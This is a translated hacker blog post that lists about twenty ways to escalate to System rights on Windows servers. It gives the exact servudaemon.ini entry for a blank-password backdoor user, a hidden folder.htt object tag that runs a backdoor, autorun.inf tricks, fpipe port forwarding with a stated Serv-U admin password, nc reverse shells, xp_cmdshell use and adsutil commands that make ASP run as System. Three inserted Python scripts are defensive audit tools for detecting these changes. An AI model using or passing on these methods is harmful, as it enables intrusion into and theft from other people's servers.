Author: Hannah. Article source: http://blog.77169.com/more.asp?Name=atan19a&ID=6866
The following is a summary I have put together. Many of these methods I have not tested, or did not succeed with, but I have seen others succeed with them. I am not particularly skilled; apart from the first method, which I studied myself, the rest is summarized from other people's experience. I hope it helps my friends!
1. Radmin connection method
The condition is that you have sufficient permissions and the other party has no firewall at all. Upload Radmin, run it, open its port, and then connect with Radmin. I have never succeeded with this, even though the port was open on the other side.
2. pcAnywhere
His pcAnywhere connection file (.CIF) is stored under C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\. Fetch that file and install pcAnywhere locally to use it.
3. SAM cracking
Take his SAM from C:\winnt\system32\config\ and crack it.
4. Serv-U password acquisition
Look under C:\Documents and Settings\All Users\Start Menu\Programs\.
Reference: find the Serv-U shortcut there and check its properties to learn the install path. Once you know the path, check whether you can browse into it.
After getting in, if you have permission to modify servudaemon.ini, add a user with a blank password:
[USER=wekwen|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=D:\|RWAMELCDP
Access3=F:\|RWAMELCDP
SKEYValues=
This user has the highest permissions; we can then use quote site exec xxx over FTP to elevate.
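For an administrator who wants to check a Serv-U configuration for exactly the kind of entry shown above (blank password, Maintenance=System, full rights on drive roots), here is an added example. It is my own code, not from the article or from Serv-U, and it runs offline against a copy of servudaemon.ini. The sample ini text is constructed; the hashed password in it is a made-up value, and the meaning of the access letters is assumed from the article's example (anything beyond R and L is treated as write-capable).

```python
import re

# Constructed sample servudaemon.ini: the entry from the article (blank password,
# Maintenance=System, full rights on every drive root) next to an ordinary user.
# The Password= value of ftpuser is a made-up placeholder, not a real Serv-U hash.
SAMPLE_SERVU_INI = r"""
[GLOBAL]
Version=4.0.0.4

[USER=wekwen|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=D:\|RWAMELCDP
Access3=F:\|RWAMELCDP
SKEYValues=

[USER=ftpuser|1]
Password=hx7c3a9f5d0c6b2e1a4f8d7c9e0b1a2c3d
HomeDir=d:\www
TimeOut=600
Maintenance=None
Access1=D:\www|RL
"""

# Permission letters that only allow reading/listing; everything else counts as write-capable.
READ_ONLY_FLAGS = set("RL")


def parse_servu_ini(text):
    """Return {section: [(key, value), ...]}, keeping duplicate keys and their order."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip(), value.strip()))
    return sections


def audit_servu_ini(text):
    """Return (user, finding) pairs for every [USER=...] section that looks like a backdoor account."""
    findings = []
    for name, entries in parse_servu_ini(text).items():
        if not name.upper().startswith("USER="):
            continue
        user = name[5:].split("|")[0]          # "wekwen|1" -> "wekwen"
        kv = {k.lower(): v for k, v in entries}
        if kv.get("password", "") == "":
            findings.append((user, "blank password"))
        if kv.get("maintenance", "").lower() == "system":
            findings.append((user, "Maintenance=System (server-wide administrator)"))
        for key, value in entries:
            if not key.lower().startswith("access"):
                continue
            path, _, perms = value.partition("|")
            is_drive_root = re.fullmatch(r"[A-Za-z]:\\?", path.strip()) is not None
            if is_drive_root and set(perms.upper()) - READ_ONLY_FLAGS:
                findings.append((user, f"write access on drive root {path} ({perms})"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_servu_ini(SAMPLE_SERVU_INI):
        print(f"{user}: {finding}")
```

Run it against the real file with open(path).read() in place of the sample; a clean configuration produces no output, and the article's entry produces five lines for wekwen alone.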
5. c:\winnt\system32\inetsrv\data\
Reference: this directory is also Full Control for Everyone. All we need to do is upload the privilege escalation tool there and execute it.
6. Serv-U overflow privilege escalation
There are many tutorials online; I will not describe it in detail.
7. Run cscript
Reference: run "cscript c:\Inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps".
Privilege escalation:
Use cscript c:\Inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps
to view the privileged DLL files: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
Then add ASP.dll to the privileged family.
ASP.dll is stored at c:\winnt\system32\inetsrv\ASP.dll (the location is not necessarily the same on every host).
Now run:
cscript adsutil.vbs set /w3svc/inprocessisapiapps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll" "C:\winnt\System32\Inetsrv\ASP.dll"
You can use cscript adsutil.vbs get /w3svc/inprocessisapiapps to check whether it was added.
8. Script elevation
Write a .bat or .vbs into C:\Documents and Settings\All Users\Start Menu\Programs\Startup.
9. VNC
This is from Xiaohua's article, hoho.
By default the VNC password is stored at HKCU\Software\ORL\WinVNC3\Password.
We can use vncx4 to crack it. vncx4 is easy to use: just run
C:\>vncx4 -W
and then enter the hexadecimal data in sequence (no carriage return is needed; simply type the hex digits).
10. nc privilege escalation
Upload an nc to the other side, provided you have enough permission to run it, and then bounce a shell back to your own machine. hoho, OK.
11. Privilege escalation by social engineering
It's easy: look at his support and contact information. Once you see an account name, try to guess the password as much as possible. The password may be his QQ number; also check his phone number as much as possible, hoho.
12. Null IPC connection
If the other party is really an idiot, scan his IPC$.
13. Service replacement
No need to say more about this; I personally find it quite complicated.
14. autorun.inf
An autorun.inf whose open= line points at xxx.exe: set the read-only, system and hidden attributes on it and upload it to the root of whichever drive you can reach. It does not run by itself; it runs only when he opens that drive.
15. desktop.ini and folder.htt
Reference: first create a folder locally (the name does not matter), enter it, right-click on the blank space and choose "Customize This Folder" (this does not seem to work on XP), then keep clicking Next with the defaults. Afterwards you will see two new items: a "Folder Settings" folder and a desktop.ini file (if you cannot see them, first turn off "Hide protected operating system files"). Find the folder.htt file in the Folder Settings directory, open it in Notepad, and add the following anywhere:
Code: <Object Id="Runit" width=0 Height=0 type="application/x-oleobject" codebase="your backdoor file name"></Object>
Then put your backdoor file in the Folder Settings directory and upload that directory together with desktop.ini into any directory on the other side. Our backdoor executes as soon as the administrator browses that directory.
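For defenders, the files described in sections 14 and 15 are plain text and easy to audit. The following is an added example of mine, not code from the article: a Python scanner that walks a directory tree (for instance a share or a copied web root) and reports folder.htt files containing an <object> tag with a codebase attribute, desktop.ini files that point at a folder.htt via PersistMoniker, and autorun.inf files with an open= or shellexecute= target. The sample files it writes into a temporary directory are constructed; the placeholder file names and the stock-control classid in them are invented for the demo.

```python
import os
import tempfile
from html.parser import HTMLParser

# Constructed folder.htt: a stock-looking WebView object (classid only, no codebase)
# next to the injected tag from the article, with a placeholder file name.
SAMPLE_FOLDER_HTT = """<html><body>
<object id="FileList" classid="clsid:PLACEHOLDER-STOCK-CONTROL" tabindex=1></object>
<Object Id="Runit" width=0 Height=0 type="application/x-oleobject"
        codebase="evil_placeholder.exe"></Object>
</body></html>
"""

# Constructed autorun.inf of the kind described in section 14.
SAMPLE_AUTORUN_INF = "[autorun]\nopen=xxx.exe\nicon=xxx.exe\n"


class _ObjectCodebaseParser(HTMLParser):
    """Collect the codebase attribute of every <object> tag; stock folder.htt objects have none."""

    def __init__(self):
        super().__init__()
        self.codebases = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":          # HTMLParser already lower-cases tag and attribute names
            return
        for name, value in attrs:
            if name == "codebase" and value:
                self.codebases.append(value.strip())


def scan_folder_htt(html_text):
    """Return codebase values of all <object> tags in a folder.htt."""
    parser = _ObjectCodebaseParser()
    parser.feed(html_text)
    return parser.codebases


def scan_autorun_inf(text):
    """Return the open=/shellexecute= targets from the [autorun] section."""
    targets, in_autorun = [], False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() in ("open", "shellexecute"):
                targets.append(value.strip())
    return targets


def scan_desktop_ini(text):
    """Return PersistMoniker= targets; these enable a custom web view backed by a folder.htt."""
    return [line.partition("=")[2].strip() for line in text.splitlines()
            if line.strip().lower().startswith("persistmoniker=")]


def scan_tree(root):
    """Walk root and return (path, kind, detail) for every suspicious file found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            low = fname.lower()
            if low not in ("folder.htt", "autorun.inf", "desktop.ini"):
                continue
            with open(path, encoding="utf-8", errors="replace") as f:
                text = f.read()
            if low == "folder.htt":
                findings += [(path, "folder-htt-object", cb) for cb in scan_folder_htt(text)]
            elif low == "autorun.inf":
                findings += [(path, "autorun-open", t) for t in scan_autorun_inf(text)]
            else:
                findings += [(path, "persist-moniker", m) for m in scan_desktop_ini(text)]
    return findings


def build_demo_tree():
    """Write the constructed samples into a temp directory laid out like a dropped folder."""
    root = tempfile.mkdtemp(prefix="folderhtt_demo_")
    settings = os.path.join(root, "Folder Settings")
    os.makedirs(settings)
    with open(os.path.join(settings, "folder.htt"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_FOLDER_HTT)
    with open(os.path.join(root, "desktop.ini"), "w", encoding="utf-8") as f:
        f.write("[.ShellClassInfo]\nPersistMoniker=file://Folder Settings\\folder.htt\n")
    with open(os.path.join(root, "autorun.inf"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_AUTORUN_INF)
    return root


if __name__ == "__main__":
    for path, kind, detail in scan_tree(build_demo_tree()):
        print(f"{kind:18} {detail!r:30} {path}")
```

Point scan_tree at a real directory to audit it; a folder.htt whose objects all lack a codebase attribute, and a desktop.ini with no PersistMoniker, produce no findings.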
16. Serv-U overwrite privilege escalation
Install Serv-U locally and overwrite your own servudaemon.ini with the servudaemon.ini downloaded from the target. Start Serv-U, and all of his configuration, including the settings above, is now exactly the same on your side.
17. Serv-U port forwarding
43958 is Serv-U's local management port. Upload fpipe.exe and execute the command fpipe -v -l 3333 -r 43958 127.0.0.1, which maps port 3333 to port 43958. Then install a Serv-U locally and create a new server: fill in the other party's IP address, account localadministrator, password #1@$AK#.1K;0@P. After connecting you can manage his Serv-U.
18. SQL account and password leakage
If the other party has MSSQL Server enabled, you can use an SQL connector to add an administrator account (the account and password are leaked in an ASP file), because MSSQL runs with system permissions by default.
Reference: if the target has not removed xp_cmdshell, use sqlexec.exe: fill in the target's IP address in the host field, your username and password in user and pass, select xp_cmdshell "%s" as the format, and click Connect. Then enter the CMD command you want in the CMD field.
19. asp.dll
Reference: because ASP.dll is stored at c:\winnt\system32\inetsrv\ASP.dll (the location is not necessarily the same on every host), we now run:
cscript adsutil.vbs set /w3svc/inprocessisapiapps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll" "C:\winnt\System32\Inetsrv\ASP.dll"
Now you can use cscript adsutil.vbs get /w3svc/inprocessisapiapps to check whether it was added.
Note: of get and set, one views the setting and the other applies it; run both from the C:\Inetpub\adminscripts> directory.
If you are an administrator and your machine has been used to escalate ASP to system permissions, the defense is to take ASP.dll out of the privileged family, that is, use the set command to overwrite the list with only the original entries.
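For administrators checking for the ASP.dll trick from sections 7 and 19, here is an added example of mine, not code from the article: a Python script that parses the output of the adsutil.vbs get command, compares the file names against the five DLLs the article lists as the stock set, and builds the set command that the note above describes as the defense. The sample output is constructed, and the exact layout adsutil prints for a LIST property is an assumption; the script relies only on the double-quoted paths.

```python
import ntpath
import re

# The in-process ISAPI DLLs the article lists as the stock set on this host.
BASELINE_INPROCESS_ISAPI = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

# Constructed sample of `cscript adsutil.vbs get w3svc/InProcessIsapiApps` output after
# ASP.dll has been added; the header line's spacing is an assumption about adsutil's layout.
SAMPLE_ADSUTIL_OUTPUT = """\
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\\winnt\\system32\\idq.dll"
  "C:\\winnt\\system32\\inetsrv\\httpext.dll"
  "C:\\winnt\\system32\\inetsrv\\httpodbc.dll"
  "C:\\winnt\\system32\\inetsrv\\ssinc.dll"
  "C:\\winnt\\system32\\msw3prt.dll"
  "C:\\winnt\\system32\\inetsrv\\asp.dll"
"""


def parse_inprocess_list(output):
    """Extract every double-quoted path from the adsutil output, whatever the surrounding layout."""
    return re.findall(r'"([^"]+)"', output)


def unexpected_inprocess_isapi(output, baseline=BASELINE_INPROCESS_ISAPI):
    """Return the listed paths whose file name is not in the baseline (e.g. asp.dll)."""
    return [p for p in parse_inprocess_list(output)
            if ntpath.basename(p).lower() not in baseline]


def build_reset_command(paths):
    """Build the adsutil set command that rewrites the list with exactly the given paths."""
    quoted = " ".join(f'"{p}"' for p in paths)
    return f"cscript adsutil.vbs set w3svc/InProcessIsapiApps {quoted}"


def remediation_command(output, baseline=BASELINE_INPROCESS_ISAPI):
    """The set command that keeps only baseline entries, i.e. the defense described in the note."""
    keep = [p for p in parse_inprocess_list(output)
            if ntpath.basename(p).lower() in baseline]
    return build_reset_command(keep)


if __name__ == "__main__":
    extra = unexpected_inprocess_isapi(SAMPLE_ADSUTIL_OUTPUT)
    print("unexpected in-process ISAPI DLLs:", extra)
    if extra:
        print("run from C:\\Inetpub\\adminscripts:")
        print(remediation_command(SAMPLE_ADSUTIL_OUTPUT))
```

Feed it the real output (cscript ... > list.txt, then open("list.txt").read()); review the generated set command before running it, since it replaces the whole list, and an empty extra list means nothing outside the baseline is loaded in-process.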
20. Magic Winmail
If there is a webshell, refer to: http://www.eviloctal.com/forum/read.php?Tid=3587
21. DBO ......
In fact there are many more ways to escalate privileges. Let's go and see how we take over the server, hoho!